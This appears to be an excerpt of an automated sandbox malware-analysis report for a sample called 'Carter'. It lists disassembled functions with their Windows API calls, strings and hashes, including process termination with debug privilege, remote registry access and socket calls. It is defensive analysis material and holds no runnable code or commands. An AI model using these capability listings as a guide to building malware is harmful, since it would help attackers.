                                                                        • Instruction ID: 4e05a140ace78067865f595a2b8ce1a73c90c64aeb0f36901171be578633bd1b
                                                                        • Opcode Fuzzy Hash: fb97cc94be901eb27466b5ee02b354df80abbb098ba35b6ccc8d869b193f1227
                                                                        • Instruction Fuzzy Hash: 47C17171B0021ADFDF90CF98C884AAFBBF5FB48354F148669EE85AB241E7709945CB50
                                                                        Function 010597FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$_memset
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 2862541840-625585964
                                                                        • Opcode ID: db6573cdd7374d0607a7de81978e71c8ad7dc1b3bc64f9b34b28d5903d8a8304
                                                                        • Instruction ID: eae926404608970c8af88ec8a37ff420ada00ef08c01192bcdd678316199c0ce
                                                                        • Opcode Fuzzy Hash: db6573cdd7374d0607a7de81978e71c8ad7dc1b3bc64f9b34b28d5903d8a8304
                                                                        • Instruction Fuzzy Hash: FD919E70A0021AEBDF65CFA9C844FAFBBB8EF45714F008559F995AB281D7709944CFA0
                                                                        Function 010673A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01067449
                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0106745D
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01067477
                                                                        • _wcscat.LIBCMT ref: 010674D2
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 010674E9
                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01067517
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat
                                                                        • String ID: SysListView32
                                                                        • API String ID: 307300125-78025650
                                                                        • Opcode ID: a3dc8058927587cfae22015f5c3259252ed3e18dcaf6cf020cf27a453e4d4ed1
                                                                        • Instruction ID: 4f828fcd0db90ca58da8f0fd42205f57b6fd26b420af9ded8a3e0f07e8a03f50
                                                                        • Opcode Fuzzy Hash: a3dc8058927587cfae22015f5c3259252ed3e18dcaf6cf020cf27a453e4d4ed1
                                                                        • Instruction Fuzzy Hash: 4D41A370A00348AFEB229F68CC85BEE7BECEF08354F10456AFAC5A7191D77599848B50
                                                                        Function 0105F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01044148: CreateToolhelp32Snapshot.KERNEL32 ref: 0104416D
                                                                          • Part of subcall function 01044148: Process32FirstW.KERNEL32(00000000,?), ref: 0104417B
                                                                          • Part of subcall function 01044148: CloseHandle.KERNEL32(00000000), ref: 01044245
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0105F08D
                                                                        • GetLastError.KERNEL32 ref: 0105F0A0
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0105F0CF
                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0105F14C
                                                                        • GetLastError.KERNEL32(00000000), ref: 0105F157
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0105F18C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                        • String ID: SeDebugPrivilege
                                                                        • API String ID: 2533919879-2896544425
                                                                        • Opcode ID: 7ca84a7ab8fe7ab9701860c29bc90372be6abe3e6c9804fb1bf848bfffa66c67
                                                                        • Instruction ID: 1040147a1eca7f4c6b2d6e2eea94b9d7db8313670002a98a71116804e4d8c1f6
                                                                        • Opcode Fuzzy Hash: 7ca84a7ab8fe7ab9701860c29bc90372be6abe3e6c9804fb1bf848bfffa66c67
                                                                        • Instruction Fuzzy Hash: 7A41E5712002029FDB25EF28CC95F6EB7E5AF85714F04845DF9865F2C2CBB9A805CB95
                                                                        Function 010434DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0104357C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2457776203-404129466
                                                                        • Opcode ID: a84675664f4702cf704892c4a3f2644cc952b58f56cebc36aa2dee2a43224b4c
                                                                        • Instruction ID: 15ead2651cf84bc6f510984efc01d34f27f15448d3445f12c257da9c93c00795
                                                                        • Opcode Fuzzy Hash: a84675664f4702cf704892c4a3f2644cc952b58f56cebc36aa2dee2a43224b4c
                                                                        • Instruction Fuzzy Hash: 49110BF16483267FAB025A15FCC1DAE77ECFF05260F10107EF9906E181D7655B4046E0
                                                                        Function 010447E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01044802
                                                                        • LoadStringW.USER32(00000000), ref: 01044809
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0104481F
                                                                        • LoadStringW.USER32(00000000), ref: 01044826
                                                                        • _wprintf.LIBCMT ref: 0104484C
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0104486A
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 01044847
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: c84a6a8ad1d7c7f655e1c22a58d777dace947bd7bad69461da645dd26f75e1a8
                                                                        • Instruction ID: db9d363dafeebca5b9ddf9d24794cf165f736e36760eab7220a782e93d8b681d
                                                                        • Opcode Fuzzy Hash: c84a6a8ad1d7c7f655e1c22a58d777dace947bd7bad69461da645dd26f75e1a8
                                                                        • Instruction Fuzzy Hash: 3D0162F2D002487FE76197A49D89EFB776CE709200F4006A9B789E6045EA759E848B74
                                                                        Function 0106DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0106DB42
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0106DB62
                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0106DD9D
                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0106DDBB
                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0106DDDC
                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0106DDFB
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0106DE20
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0106DE43
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                        • String ID:
                                                                        • API String ID: 1211466189-0
                                                                        • Opcode ID: 99c32fb3718adaad44546833ac4b8717b75e6c523efc998340cd60376f9c1d38
                                                                        • Instruction ID: 645a737d8f395f5d34ae6cd8921307b7c92c8c2d392aaa69ea1c2fb3916046b3
                                                                        • Opcode Fuzzy Hash: 99c32fb3718adaad44546833ac4b8717b75e6c523efc998340cd60376f9c1d38
                                                                        • Instruction Fuzzy Hash: 01B19A30A00219EFDF14DFA9C9847AD7BF5BF44710F0881A9EDC8AE289D775A950CB90
                                                                        Function 01060371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0106147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0106044E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                        • String ID:
                                                                        • API String ID: 3479070676-0
                                                                        • Opcode ID: b7dd33c4efcb0b91a9b3284b3470763b9e97c22f66362fb12812fa3d0d72f276
                                                                        • Instruction ID: 990e5d66831128a04fe9992daa1c18374a21a4260bfe1b80c424790b236737a3
                                                                        • Opcode Fuzzy Hash: b7dd33c4efcb0b91a9b3284b3470763b9e97c22f66362fb12812fa3d0d72f276
                                                                        • Instruction Fuzzy Hash: 14A19A70204205DFDB21EF28C880B6EBBE9FF84314F14891CF596972A6DB39E945CB42
                                                                        Function 00FE2E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0101C508,00000004,00000000,00000000,00000000), ref: 00FE2E9F
                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0101C508,00000004,00000000,00000000,00000000,000000FF), ref: 00FE2EE7
                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0101C508,00000004,00000000,00000000,00000000), ref: 0101C55B
                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0101C508,00000004,00000000,00000000,00000000), ref: 0101C5C7
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: 5871b76ac28426acbeae6d4284ac92d5991f0d3af5ed7fa958d33fb7d0a95864
                                                                        • Instruction ID: df6d0cce6fc7b0eb179b435bfd79e724caa239f51d6bdc6c7ee08133de804354
                                                                        • Opcode Fuzzy Hash: 5871b76ac28426acbeae6d4284ac92d5991f0d3af5ed7fa958d33fb7d0a95864
                                                                        • Instruction Fuzzy Hash: 59413931A046D09AE7B98B2AC98873E7B9ABB85310F64850DF4C743558E779E880F711
                                                                        Function 01047681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 01047698
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 010476CF
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 010476EB
                                                                        • _memmove.LIBCMT ref: 01047739
                                                                        • _memmove.LIBCMT ref: 01047756
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 01047765
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0104777A
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 01047799
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 256516436-0
                                                                        • Opcode ID: b960d15c9a6108093377c992bc15d9b84f512e6f69f6ecb48c1489482de1eb16
                                                                        • Instruction ID: 6baddabf2f7b535badfd231875754c57f0925c81699b2248ae9067d3c203c15e
                                                                        • Opcode Fuzzy Hash: b960d15c9a6108093377c992bc15d9b84f512e6f69f6ecb48c1489482de1eb16
                                                                        • Instruction Fuzzy Hash: 37317E72A00205EBDB11EF64D884EAEB7B8FF45350F1481A9F944AA289D775DA10DBA0
                                                                        Function 010667F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 01066810
                                                                        • GetDC.USER32(00000000), ref: 01066818
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01066823
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0106682F
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0106686B
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0106687C
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0106964F,?,?,000000FF,00000000,?,000000FF,?), ref: 010668B6
                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010668D6
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        • Opcode ID: 716cdf81a256cb048466bd4fcffb168a31e40f60e406b59d333f1a6bc867cc74
                                                                        • Instruction ID: 9f590803e21894512a3cd71920de1e0d4d872ad428e9a2b496b6c243e7896c09
                                                                        • Opcode Fuzzy Hash: 716cdf81a256cb048466bd4fcffb168a31e40f60e406b59d333f1a6bc867cc74
                                                                        • Instruction Fuzzy Hash: 5A316F725011147FEB214F54CC49FEB3FADEF4A761F044155FE48AA185C67A9841CBB0
                                                                        Function 0103C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID:
                                                                        • API String ID: 2931989736-0
                                                                        • Opcode ID: 8294ca7c1bc8fc1f42e82e85563d0fc1a89269ca56a673d09f71b87f84086372
                                                                        • Instruction ID: 812463c909a8d48405b111f5bced7eeb47174d9e0e648d11a912c9661a2a3685
                                                                        • Opcode Fuzzy Hash: 8294ca7c1bc8fc1f42e82e85563d0fc1a89269ca56a673d09f71b87f84086372
                                                                        • Instruction Fuzzy Hash: 3C210A76B0420676B20276164F81FFF379CBEA4650F040026FDC6FA243EB20DD1182A5
                                                                        Function 0104F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                          • Part of subcall function 00FF436A: _wcscpy.LIBCMT ref: 00FF438D
                                                                        • _wcstok.LIBCMT ref: 0104F2D7
                                                                        • _wcscpy.LIBCMT ref: 0104F366
                                                                        • _memset.LIBCMT ref: 0104F399
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 774024439-3081909835
                                                                        • Opcode ID: b9d427cf6bfdffb05be52de4d54bf2a69c5625b39ca0d461d117a043369d569e
                                                                        • Instruction ID: e91a985e2f09316d5900160b67a2c808c21f7b9c1270c64c0362c57cd8737570
                                                                        • Opcode Fuzzy Hash: b9d427cf6bfdffb05be52de4d54bf2a69c5625b39ca0d461d117a043369d569e
                                                                        • Instruction Fuzzy Hash: FDC1A071604342DFD764EF68C891AAEB7E4BF85350F00492DFAD9972A1DB34E805CB82
                                                                        Function 010571EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 010572EB
                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0105730C
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0105731F
                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 010573D5
                                                                        • inet_ntoa.WSOCK32(?), ref: 01057392
                                                                          • Part of subcall function 0103B4EA: _strlen.LIBCMT ref: 0103B4F4
                                                                          • Part of subcall function 0103B4EA: _memmove.LIBCMT ref: 0103B516
                                                                        • _strlen.LIBCMT ref: 0105742F
                                                                        • _memmove.LIBCMT ref: 01057498
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 3619996494-0
                                                                        • Opcode ID: a3ab5b21d04b7178353db2cbf9c4d8b9988f75b8a7f682429900fd34fcb17224
                                                                        • Instruction ID: 172829a9ac921d68ee1c0eb516a7a3de7e90d737abfabb3e2b3fdeaef67cb638
                                                                        • Opcode Fuzzy Hash: a3ab5b21d04b7178353db2cbf9c4d8b9988f75b8a7f682429900fd34fcb17224
                                                                        • Instruction Fuzzy Hash: 4281F171504301ABD750EB25CC81E6FBBE8EF84714F44861CFA869B2A2DB74ED01DB92
                                                                        Function 00FE1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 62a8489124090b4b38699576053894704285373127f33f685c33bf2e75e295e3
                                                                        • Instruction ID: 0f6591c678306a875813f371a1b9dc96555e99e80db6a7cc31b942003a2d6aa2
                                                                        • Opcode Fuzzy Hash: 62a8489124090b4b38699576053894704285373127f33f685c33bf2e75e295e3
                                                                        • Instruction Fuzzy Hash: 4A718D31900149EFDB14CF9ACC88EBEBB79FF86310F148259F955AB251C734AA51DBA0
                                                                        Function 0106B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindow.USER32(011F5FB0), ref: 0106BA5D
                                                                        • IsWindowEnabled.USER32(011F5FB0), ref: 0106BA69
